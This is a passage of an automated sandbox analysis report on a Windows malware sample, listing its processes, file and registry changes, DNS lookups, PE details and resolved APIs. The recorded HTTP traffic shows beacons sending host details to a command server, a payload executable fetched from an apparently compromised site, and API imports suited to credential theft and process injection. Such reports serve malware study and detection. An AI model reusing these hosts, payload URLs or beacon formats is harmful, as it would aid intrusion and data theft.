- ]
- [*] Executed Commands: [
- "cmd /K",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BN65EA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BNB91.tmp",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\system32\\WerFault.exe -u -p 3060 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\""
- ]
- [*] Mutexes: [
- "DBWinMutex",
- "Local\\mtxLogMeInIgnition.IgnitionMutex",
- "Local\\WERReportingForProcess3060",
- "Global\\\\xe5\\x88\\x90\\xc2\\xa4",
- "Global\\\\xed\\x95\\xb0\\xc7\\x82",
- "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
- ]
- [*] Modified Files: [
- "\\??\\PIPE\\samr",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BN65EA.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BNB91.tmp",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\0efb1c2e-8bcc-468c-aa07-37b1f761840f",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WEREE4F.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC19.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC49.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER1795.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\WEREE4F.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\WERC19.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\WERC49.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\WER1795.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\Report.wer.tmp"
- ]
- [*] Deleted Files: [
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WEREE4F.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WEREE4F.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC19.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC19.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC49.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC49.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER1795.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER1795.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0333223c\\Report.wer.tmp"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\WinRAR",
- "HKEY_CURRENT_USER\\Software\\WinRAR\\HWID",
- "HKEY_CURRENT_USER\\Software\\WinRAR\\Client Hash",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "api.ipify.org",
- "answers": [
- {
- "data": "54.204.36.156",
- "type": "A"
- },
- {
- "data": "50.16.229.140",
- "type": "A"
- },
- {
- "data": "107.22.215.20",
- "type": "A"
- },
- {
- "data": "23.23.243.154",
- "type": "A"
- },
- {
- "data": "nagano-19599.herokussl.com",
- "type": "CNAME"
- },
- {
- "data": "23.21.121.219",
- "type": "A"
- },
- {
- "data": "54.243.147.226",
- "type": "A"
- },
- {
- "data": "54.235.124.112",
- "type": "A"
- },
- {
- "data": "elb097307-934924932.us-east-1.elb.amazonaws.com",
- "type": "CNAME"
- },
- {
- "data": "50.19.247.198",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "andpartanthat.com",
- "answers": [
- {
- "data": "54.37.139.198",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "geysirland.com",
- "answers": [
- {
- "data": "192.186.250.99",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "www.gruenbaum.com.br",
- "answers": [
- {
- "data": "177.12.164.114",
- "type": "A"
- },
- {
- "data": "web2067.uni5.net",
- "type": "CNAME"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "54.37.139.198",
- "domain": "andpartanthat.com"
- },
- {
- "ip": "23.23.243.154",
- "domain": "api.ipify.org"
- },
- {
- "ip": "192.186.250.99",
- "domain": "geysirland.com"
- },
- {
- "ip": "177.12.164.114",
- "domain": "www.gruenbaum.com.br"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://api.ipify.org/",
- "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
- "method": "GET",
- "host": "api.ipify.org",
- "version": "1.1",
- "path": "/",
- "data": "GET / HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nHost: api.ipify.org\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 13,
- "body": "GUID=13962712492586483736&BUILD=0207_349876&INFO=Host @ Host\\user&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)",
- "uri": "http://andpartanthat.com/4/forum.php",
- "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
- "method": "POST",
- "host": "andpartanthat.com",
- "version": "1.1",
- "path": "/4/forum.php",
- "data": "POST /4/forum.php HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nHost: andpartanthat.com\r\nContent-Length: 108\r\nCache-Control: no-cache\r\n\r\nGUID=13962712492586483736&BUILD=0207_349876&INFO=Host @ Host\\user&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://geysirland.com/wp-content/plugins//1",
- "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
- "method": "GET",
- "host": "geysirland.com",
- "version": "1.1",
- "path": "/wp-content/plugins//1",
- "data": "GET /wp-content/plugins//1 HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nHost: geysirland.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://andpartanthat.com/mlu/forum.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "POST",
- "host": "andpartanthat.com",
- "version": "1.0",
- "path": "/mlu/forum.php",
- "data": "POST /mlu/forum.php HTTP/1.0\r\nHost: andpartanthat.com\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: 208\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://www.gruenbaum.com.br/wp-content/plugins/qtranslate/art2.exe",
- "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
- "method": "GET",
- "host": "www.gruenbaum.com.br",
- "version": "1.1",
- "path": "/wp-content/plugins/qtranslate/art2.exe",
- "data": "GET /wp-content/plugins/qtranslate/art2.exe HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\nHost: www.gruenbaum.com.br\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://31.44.184.33/H7mp",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)",
- "method": "GET",
- "host": "31.44.184.33",
- "version": "1.1",
- "path": "/H7mp",
- "data": "GET /H7mp HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)\r\nHost: 31.44.184.33\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 23,
- "body": "",
- "uri": "http://31.44.184.33/ga.js",
- "user-agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)",
- "method": "GET",
- "host": "31.44.184.33",
- "version": "1.1",
- "path": "/ga.js",
- "data": "GET /ga.js HTTP/1.1\r\nAccept: */*\r\nCookie: BQhbgA3gj6AlqOiphFfDaFALGhJBhY65cEJHIGEiYzXUKJU65KCihqYEvi/McWznEacMqwjzBbIKHtmbLe04t6V+fLJnAbJgEXwkvn/4mUMlC2RuDgc5W6A6PbeQR/YE9SfRxtnnLSpivZ97Mh9xn/FBMmgzMuYuyi+c29ItjgI=\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\nHost: 31.44.184.33\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 19,
- "body": "",
- "uri": "http://31.44.184.33/ga.js",
- "user-agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)",
- "method": "GET",
- "host": "31.44.184.33",
- "version": "1.1",
- "path": "/ga.js",
- "data": "GET /ga.js HTTP/1.1\r\nAccept: */*\r\nCookie: pc35X9XjDut8k/7XrpFmflAfwF4xwANLjFA2Qa6zjugXXeDzu1X9nwAoUwwBfgXDJLfHeXr+9MN+3LelFo0pPKigqXoQONvKd1ZsxSZMQoN1WqONUFqDYKlr9Sd2/ngqZJ3NOnuTTuQaZf/vdssE4SG+lUeRjwp1Ev1DnWOA6aA=\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)\r\nHost: 31.44.184.33\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FreeLibrary",
- "address": "0x412000"
- },
- {
- "name": "GetLastError",
- "address": "0x412004"
- },
- {
- "name": "VirtualProtect",
- "address": "0x412008"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x41200c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x412010"
- },
- {
- "name": "GetProcAddress",
- "address": "0x412014"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x412018"
- },
- {
- "name": "ExitProcess",
- "address": "0x41201c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x412020"
- },
- {
- "name": "Sleep",
- "address": "0x412024"
- },
- {
- "name": "GetSystemDefaultLangID",
- "address": "0x412028"
- },
- {
- "name": "InterlockedCompareExchange",
- "address": "0x41202c"
- },
- {
- "name": "TerminateProcess",
- "address": "0x412030"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x412034"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x412038"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x41203c"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x412040"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x412044"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x412048"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x41204c"
- },
- {
- "name": "GetTickCount",
- "address": "0x412050"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x412054"
- },
- {
- "name": "GlobalAddAtomW",
- "address": "0x412058"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x41205c"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x412060"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "CoInitialize",
- "address": "0x412068"
- },
- {
- "name": "CoUninitialize",
- "address": "0x41206c"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00018dec",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00018dec",
- "icon_hash": null,
- "entrypoint": "0x0040a7af",
- "timestamp": "2019-04-17 05:52:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00010e00",
- "entropy": "5.14",
- "raw_address": "0x00000400",
- "virtual_size": "0x00010c90",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00012000",
- "size_of_data": "0x00000a00",
- "entropy": "3.11",
- "raw_address": "0x00011200",
- "virtual_size": "0x0000092c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00013000",
- "size_of_data": "0x00003c00",
- "entropy": "1.08",
- "raw_address": "0x00011c00",
- "virtual_size": "0x00006cc0",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0001a000",
- "size_of_data": "0x00002000",
- "entropy": "5.21",
- "raw_address": "0x00015800",
- "virtual_size": "0x00002000",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00002f10",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000049c"
- },
- {
- "virtual_address": "0x00012640",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x0001a000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00001328"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00012000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000074"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "255baa199749cf1034252ceb61a58ccd",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.OutputDebugStringA",
- "ntdll.dll._stricmp",
- "ntdll.dll.memset",
- "ntdll.dll.memcpy",
- "wininet.dll.InternetOpenA",
- "wininet.dll.HttpSendRequestA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCrackUrlA",
- "wininet.dll.HttpOpenRequestA",
- "wininet.dll.InternetSetOptionA",
- "wininet.dll.InternetQueryOptionA",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetConnectA",
- "wininet.dll.InternetCloseHandle",
- "iphlpapi.dll.GetAdaptersAddresses",
- "psapi.dll.GetProcessImageFileNameA",
- "psapi.dll.EnumProcesses",
- "ntdll.dll.RtlDecompressBuffer",
- "kernel32.dll.GetComputerNameA",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.GetTempFileNameA",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.HeapFree",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetVersion",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.GetWindowsDirectoryA",
- "kernel32.dll.GetVolumeInformationA",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.Sleep",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.VirtualAllocEx",
- "kernel32.dll.VirtualFreeEx",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.CreateThread",
- "kernel32.dll.GetProcessId",
- "kernel32.dll.GetLastError",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.GetThreadContext",
- "kernel32.dll.SetThreadContext",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.WriteFile",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.lstrcmpiA",
- "kernel32.dll.GetEnvironmentVariableA",
- "kernel32.dll.GetTempPathA",
- "user32.dll.wsprintfA",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDecrypt",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptDeriveKey",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.LookupAccountSidA",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.OpenProcessToken",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "sechost.dll.LookupAccountSidLocalA",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "kernel32.dll.GetNativeSystemInfo",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptDeriveKey",
- "cryptsp.dll.CryptDecrypt",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "cryptsp.dll.CryptReleaseContext",
- "wsock32.dll.inet_addr",
- "wsock32.dll.gethostbyname",
- "wsock32.dll.socket",
- "wsock32.dll.connect",
- "wsock32.dll.closesocket",
- "wsock32.dll.send",
- "wsock32.dll.select",
- "wsock32.dll.recv",
- "wsock32.dll.setsockopt",
- "wsock32.dll.WSAStartup",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GetFileAttributesA",
- "kernel32.dll.ExpandEnvironmentStringsA",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.CreateFileMappingA",
- "kernel32.dll.MapViewOfFile",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.CreateDirectoryA",
- "kernel32.dll.DeleteFileA",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.FindClose",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.GetLocaleInfoA",
- "kernel32.dll.GetPrivateProfileStringA",
- "kernel32.dll.SetCurrentDirectoryA",
- "kernel32.dll.GetPrivateProfileSectionNamesA",
- "kernel32.dll.GetPrivateProfileIntA",
- "kernel32.dll.GetCurrentDirectoryA",
- "kernel32.dll.lstrlenW",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.LCMapStringA",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "urlmon.dll.ObtainUserAgentString",
- "userenv.dll.LoadUserProfileA",
- "userenv.dll.UnloadUserProfile",
- "ole32.dll.CreateStreamOnHGlobal",
- "ole32.dll.GetHGlobalFromStream",
- "ole32.dll.CoCreateGuid",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.OleInitialize",
- "user32.dll.FindWindowExA",
- "user32.dll.SendMessageA",
- "user32.dll.GetClassNameA",
- "user32.dll.SendMessageW",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegOpenKeyA",
- "advapi32.dll.RegEnumKeyExA",
- "advapi32.dll.RegCreateKeyA",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.IsTextUnicode",
- "advapi32.dll.RegOpenCurrentUser",
- "advapi32.dll.GetUserNameA",
- "wininet.dll.InternetCreateUrlA",
- "shlwapi.dll.StrStrIA",
- "shlwapi.dll.StrRChrIA",
- "shlwapi.dll.StrToIntA",
- "shlwapi.dll.StrCmpNIA",
- "shlwapi.dll.StrStrIW",
- "shlwapi.dll.StrStrA",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "ole32.dll.StgOpenStorage",
- "crypt32.dll.CryptUnprotectData",
- "crypt32.dll.CertOpenSystemStoreA",
- "crypt32.dll.CertEnumCertificatesInStore",
- "crypt32.dll.CertCloseStore",
- "crypt32.dll.CryptAcquireCertificatePrivateKey",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.FreeSid",
- "advapi32.dll.CredEnumerateA",
- "advapi32.dll.CredFree",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.RevertToSelf",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.ConvertSidToStringSidA",
- "advapi32.dll.LogonUserA",
- "advapi32.dll.LookupPrivilegeValueA",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.CreateProcessAsUserA",
- "shell32.dll.SHGetFolderPathA",
- "netapi32.dll.NetApiBufferFree",
- "netapi32.dll.NetUserEnum",
- "kernel32.dll.WTSGetActiveConsoleSessionId",
- "kernel32.dll.ProcessIdToSessionId",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultGetItem",
- "vaultcli.dll.VaultCloseVault",
- "vaultcli.dll.VaultFree",
- "msi.dll.MsiGetComponentPathA",
- "pstorec.dll.PStoreCreateInstance",
- "userenv.dll.CreateEnvironmentBlock",
- "userenv.dll.DestroyEnvironmentBlock",
- "kernel32.dll.IsWow64Process",
- "mlang.dll.#112",
- "wininet.dll.FindFirstUrlCacheEntryA",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "wininet.dll.FindNextUrlCacheEntryA",
- "urlmon.dll.CreateIUriBuilder",
- "urlmon.dll.IntlPercentEncodeNormalize",
- "wininet.dll.FindCloseUrlCache",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "samlib.dll.SamGetCompatibilityMode",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamEnumerateUsersInDomain",
- "samlib.dll.SamOpenUser",
- "samlib.dll.SamQueryInformationUser",
- "samlib.dll.SamQuerySecurityObject",
- "samlib.dll.SamGetGroupsForUser",
- "samlib.dll.SamRidToSid",
- "samlib.dll.SamGetAliasMembership",
- "samlib.dll.SamCloseHandle",
- "sspicli.dll.LogonUserExExW",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.VirtualProtect",
- "msvcrt.dll.__dllonexit",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll.__initenv",
- "msvcrt.dll.__lconv_init",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._acmdln",
- "msvcrt.dll._amsg_exit",
- "msvcrt.dll._cexit",
- "msvcrt.dll._fmode",
- "msvcrt.dll._initterm",
- "msvcrt.dll._iob",
- "msvcrt.dll._lock",
- "msvcrt.dll._onexit",
